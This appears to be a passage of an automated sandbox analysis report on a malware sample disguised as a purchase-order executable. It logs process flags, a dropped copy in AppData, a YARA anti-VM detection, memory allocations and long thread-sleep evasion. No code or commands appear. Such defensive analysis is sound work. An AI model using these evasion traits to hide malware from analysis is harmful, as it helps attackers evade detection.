Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: PO-0Y9005373R664.exe PID: 6964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VvtddClQv.exe PID: 3788, type: MEMORYSTR

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Memory allocated: 10D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Memory allocated: 2990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Memory allocated: 7900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Memory allocated: 7310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Memory allocated: 8900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Memory allocated: 9900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Memory allocated: AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Memory allocated: 2990000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Memory allocated: D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Memory allocated: 7160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Memory allocated: 6D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Memory allocated: 8160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Memory allocated: 9160000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VvtddClQv.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6028			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5606			Jump to behavior

Source: C:\Users\user\Desktop\PO-0Y9005373R664.exe TID: 2716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6880	Thread sleep count: 6028 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6860	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
